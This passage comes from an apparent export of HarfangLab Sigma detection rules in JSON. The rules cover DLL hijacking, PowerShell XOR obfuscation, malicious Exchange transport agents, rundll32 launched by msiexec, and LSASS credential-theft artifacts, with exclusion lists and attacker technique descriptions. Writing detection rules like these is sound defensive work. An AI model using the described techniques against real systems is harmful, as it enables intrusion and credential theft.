attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vssadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "027c5f6b-cba7-426c-af04-233b87967507",
"rule_name": "DLL Hijacking via vssadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vssadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "029996a2-753c-4bd1-ac20-b8f180acbf90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.491571Z",
"creation_date": "2026-03-23T11:45:34.624842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624846Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/yellow-cockatoo/",
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/"
],
"name": "t1059_001_powershell_xor_obfuscation_script.yml",
"content": "title: PowerShell XOR Obfuscation\nid: 029996a2-753c-4bd1-ac20-b8f180acbf90\ndescription: |\n Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\n This is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\n It is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\n If the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/06/24\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1027\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # seen in PowerShell commandlines : ;$_-bXoR$S[($S[$I]+$S[$H])%256]}};\n selection:\n PowershellCommand|contains: '-bxor'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_remote_exchange:\n PowershellCommand|contains|all:\n - 'function ExportPSSessionAndImportModule'\n - 'hashValue -bxor ?CurrentUserRemotePSSettings.Hash'\n # function ExportPSSessionAndImportModule ($remotePSSettinsPath, $modulePath, [switch]$AllowClobber)\n # {\n # $hashValue = $global:remoteSession.ApplicationPrivateData.ImplicitRemoting.Hash\n # $CurrentUserRemotePSSettings = Get-ItemProperty -path $remotePSSettinsPath -ErrorAction SilentlyContinue\n # # PS3.0, Get-ItemProperty will return DWORD data as UInt32, instead of 
Int32 in PS2.0.\n # # If $hashValue is negative, (CurrentUserRemotePSSettings.Hash -ne $hashValue) will always be $true\n # # We use bitwise xor operation to work around\n # if (($CurrentUserRemotePSSettings -eq $null) `\n # -or ($CurrentUserRemotePSSettings.Hash -eq $null) `\n # -or (-not ($CurrentUserRemotePSSettings.ModulePath)) `\n # -or (($hashValue -bxor $CurrentUserRemotePSSettings.Hash) -ne 0))\n # {\n # # Redo Everything, when:\n # # 1. No registry entry found, or\n # # 2. Registry entry exists, but hash value or ModulePath is empty (which is very unlikely) or\n exclusion_sentinel_one:\n # C:\\Program Files\\SentinelOne\\Sentinel Agent 21.6.2.272\\SentinelPie.bin\n PowershellScriptPath: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelPie.bin'\n\n exclusion_defender:\n # C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1\n - PowershellCommand|contains:\n - 'xor between (2^32 - 1) and (2^(32-cidr) - 1) giving a binary with (32-cidr) leading bits ON'\n - '[ipaddress]([math]::pow(2, 32) -1 -bxor'\n - 'pow(2, 32) -1 -bxor [math]::pow(2, (32 - $cidr))-1)'\n - ProcessParentImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseCM.exe'\n\n exclusion_desktop_ini_hidden:\n # https://github.com/Vincoll/PS_NetworkShortcutTreeview\n # https://github.com/pauby/oxygen\n PowershellCommand|contains|all:\n - 'Desktop.ini'\n - '-Name Attributes -Value ([IO.FileAttributes]::System -bxor [IO.FileAttributes]::Hidden'\n\n # https://www.powershellgallery.com/packages/dbatools/1.1.103/Content/functions%5CInvoke-DbaDbDecryptObject.ps1\n exclusion_dbatool1:\n PowershellCommand|contains|all:\n - 'function Invoke-DecryptData() {'\n - '# Loop through each of the characters and apply an XOR to decrypt the data'\n - '# 
Compare the byte string character to the key character using XOR'\n - '# Create array list to hold the results'\n exclusion_dbatool2:\n PowershellCommand|contains|all:\n - 'function Get-DbaProductKey {'\n - '.SYNOPSIS'\n exclusion_dbatool3:\n PowershellCommand|contains|all:\n - 'function Find-DbaInstance {'\n - '.SYNOPSIS'\n\n exclusion_ixbs_apps:\n ProcessGrandparentImage:\n - '?:\\SRCI\\iXBs_Applications\\iXBus Serveur\\Plugins\\\\*\\service.exe'\n - '?:\\SRCI\\iXBs_Applications\\iXBus Server\\Plugins\\\\*\\service.exe'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\program files\\powershell\\7\\Modules\\'\n - '?:\\Program Files (x86)\\Spiceworks Agent Shell\\modules\\Inventory Module\\'\n\n exclusion_cyberwatch:\n - ProcessImage|endswith: 'CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CYBERWATCH SAS'\n - ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_ansible:\n - ProcessGrandparentCommandLine|contains:\n - 'powershell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains:\n - '?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\OpenSSH\\sshd.exe|?:\\Windows\\System32\\services.exe'\n - ProcessCommandLine|contains: 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains: '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - PowershellCommand|contains: '$module = [Ansible.Basic.AnsibleModule]::Create($args, $spec)'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k 
netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_log4net:\n - PowershellScriptPath|endswith: '\\Log4Net-Module\\Log4Net-Module.psm1'\n - PowershellCommand|contains|all:\n - '# Example of File Appender initialization'\n - '$Log = [log4net.LogManager]::GetLogger(\"root\");'\n - '# $Log.$Level($Message); # Ne fonctionnait pas sous 2012 non R2 PS3.0'\n - '[log4net.LogManager]::ResetConfiguration();'\n\n exclusion_ninjarmm:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\*.ps1'\n\n # https://github.com/DanysysTeam/PS-SFTA/blob/master/SFTA.ps1\n exclusion_sfta:\n PowershellCommand|contains|all:\n - 'https://github.com/DanysysTeam/PS-SFTA'\n - 'function Get-FTA {'\n - 'Write-Output (( $iValue -shr $iCount) -bxor 0xFFFF0000)'\n\n exclusion_sysvol:\n PowershellScriptPath|contains: '\\sysvol\\\\*\\Policies\\{????????-????-????-????-????????????}\\User\\Scripts\\'\n\n exclusion_avacee:\n ProcessParentImage: '?:\\Program Files\\Avacee\\sip_agent\\SIPAgent.exe'\n\n exclusion_wybot:\n ProcessParentImage: '?:\\Program Files\\osquery\\\\*.exe'\n Signed: 'true'\n Signature: 'WYBOT SAS'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "029996a2-753c-4bd1-ac20-b8f180acbf90",
"rule_name": "PowerShell XOR Obfuscation",
"rule_description": "Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\nThis is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\nIt is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\nIf the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "029b4b5e-5b84-4646-ae2b-9c19d795c627",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617032Z",
"creation_date": "2026-03-23T11:45:34.617036Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617043Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_edgetransport_loading_unsigned_dll.yml",
"content": "title: Exchange EdgeTransport.exe Loaded Unsigned DLL\nid: 029b4b5e-5b84-4646-ae2b-9c19d795c627\ndescription: |\n Detects the loading of an unsigned DLL into EdgeTransport.exe.\n Attackers can install malicious TransportAgents in a compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange server, and can also act as a command and control component.\n It is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/22\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1071.003\n - attack.t1104\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EdgeTransport.exe'\n ImageLoaded|contains: '?'\n\n filter_empty:\n ImageSize: 0\n\n filter_microsoft_pdb:\n ManagedPdbBuildPath|startswith:\n - '?:\\dbs\\sh\\e16dt\\'\n - '?:\\dbs\\sh\\gffn\\'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_assembly:\n ImageLoaded|startswith: '?:\\Windows\\assembly\\'\n\n 
exclusion_msvcm:\n ImageLoaded: '?:\\Windows\\winsxs\\amd64_microsoft.vc*.crt_*\\msvcm*.dll'\n\n exclusion_trendmicro:\n ImageLoaded|startswith: '?:\\Program Files\\Trend Micro\\Smex\\'\n\n exclusion_newton_json:\n ManagedPdbBuildPath: '?:\\Development\\Releases\\Json\\Working\\Newtonsoft.Json\\Src\\Newtonsoft.Json\\obj\\Release\\Newtonsoft.Json.pdb'\n\n exclusion_skimsigner:\n ImageLoaded|startswith: '?:\\Program Files\\Exchange DkimSigner'\n\n exclusion_exclaimer:\n ImageLoaded|startswith: '?:\\Program Files\\Exclaimer Ltd\\Email Alias Manager\\'\n\n exclusion_xml_serializer:\n sha256: 'd934a6ed579619a0c0629606a0b774855703a5eec5661749e823d4456ed77e33'\n ImageLoaded|startswith: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\XmlSerializer.Exclaimer.LeanLicensing.License_'\n\n exclusion_passive_monitoring:\n sha256: '5eb73220279d1fa2525912a6e34061646990382b82dbd250297dbf6bbb8a9aaf'\n\n exclusion_mimekit:\n - ImageLoaded: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\MimeKit.dll'\n - sha256: '69ae032bad923d3e9b7ad95b569222cdbe6ddcfb56cb302e7419869000b07dcd'\n\n exclusion_codetwo:\n ImageLoaded: '?:\\Program Files\\CodeTwo\\CodeTwo Exchange Rules\\\\*.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "029b4b5e-5b84-4646-ae2b-9c19d795c627",
"rule_name": "Exchange EdgeTransport.exe Loaded Unsigned DLL",
"rule_description": "Detects the loading of an unsigned DLL into EdgeTransport.exe.\nAttackers can install malicious TransportAgents in a compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange server, and can also act as a command and control component.\nIt is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "029c4324-60c2-46df-b249-b6b72b737c5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616491Z",
"creation_date": "2026-03-23T11:45:34.616495Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Cryptolaemus1/status/1733243361534857222",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_rundll32_msiexec.yml",
"content": "title: Suspicious RunDLL32 Execution via MSIExec\nid: 029c4324-60c2-46df-b249-b6b72b737c5e\ndescription: |\n Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\n Attackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\n Specifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\n This behavior is used by the Pikabot malware, in its initial infection chain.\n It is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1733243361534857222\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2023/12/11\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'RUNDLL32.EXE'\n CommandLine|contains: '?:\\Users\\\\*\\AppData\\Local\\Temp'\n ParentImage|endswith: '\\rundll32.exe'\n GrandparentImage|endswith: '\\msiexec.exe'\n\n exclusion_setupapi:\n CommandLine|contains: 'setupapi,InstallHinfSection'\n\n exclusion_adinstrument:\n CommandLine|contains: '\\ADInstruments\\LabChart8\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "029c4324-60c2-46df-b249-b6b72b737c5e",
"rule_name": "Suspicious RunDLL32 Execution via MSIExec",
"rule_description": "Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\nAttackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\nSpecifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\nThis behavior is used by the Pikabot malware, in its initial infection chain.\nIt is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297348Z",
"creation_date": "2026-03-23T11:45:35.297352Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297359Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz"
],
"name": "t1003_001_lsass_dropping_file_unknown_module.yml",
"content": "title: File Dropped by LSASS Process from Unknown Module\nid: 02b0f6f4-476e-4b12-8067-6fbac9b0fc30\ndescription: |\n Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\n The LSASS process is responsible for authentications in Windows.\n Adversaries may attempt to access credential material stored in the LSASS' process memory.\n A file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n If this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\ndate: 2025/03/24\nmodified: 2026/03/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n MinimalStackTrace|endswith: '|UNKNOWN'\n\n exclusion_netlogon:\n Path: '?:\\Windows\\System32\\config\\netlogon.ftl'\n\n exclusion_path:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\Keys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\System Volume Information\\EFS0.LOG'\n - '?:\\Windows\\NTDS\\edbtmp.log'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n - '?:\\Users\\\\*\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - 
'?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\\\????????-????-????-????-????????????'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\User\\\\????????-????-????-????-????????????'\n\n exclusion_credential_manager:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????????????????????????????????????.vcrd'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????-????-????-????-????????????.vsch'\n\n exclusion_securetimeaggregator:\n Path: '?:\\Windows\\System32\\\\????????-????-????-????-????????????'\n StackTrace|contains: '|?:\\Windows\\System32\\SecureTimeAggregator.dll!'\n\n exclusion_btpass:\n MinimalStackTrace|contains: '|BTPassAsm.dll|'\n Path: '?:\\Windows\\BTPass\\BT*.txt'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30",
"rule_name": "File Dropped by LSASS Process from Unknown Module",
"rule_description": "Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\nThe LSASS process is responsible for authentications in Windows.\nAdversaries may attempt to access credential material stored in the LSASS' process memory.\nA file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nIf this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\n",
"rule_creation_date": "2025-03-24",
"rule_modified_date": "2026-03-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02c15562-11e7-4250-b6e6-12f040b41450",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591575Z",
"creation_date": "2026-03-23T11:45:34.591579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591587Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iesettingsync.yml",
"content": "title: DLL Hijacking via IESettingSync.exe\nid: 02c15562-11e7-4250-b6e6-12f040b41450\ndescription: |\n Detects potential Windows DLL Hijacking via IESettingSync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IESettingSync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\iertutil.dll'\n - '\\mpr.dll'\n - '\\sspicli.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02c15562-11e7-4250-b6e6-12f040b41450",
"rule_name": "DLL Hijacking via IESettingSync.exe",
"rule_description": "Detects potential Windows DLL Hijacking via IESettingSync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
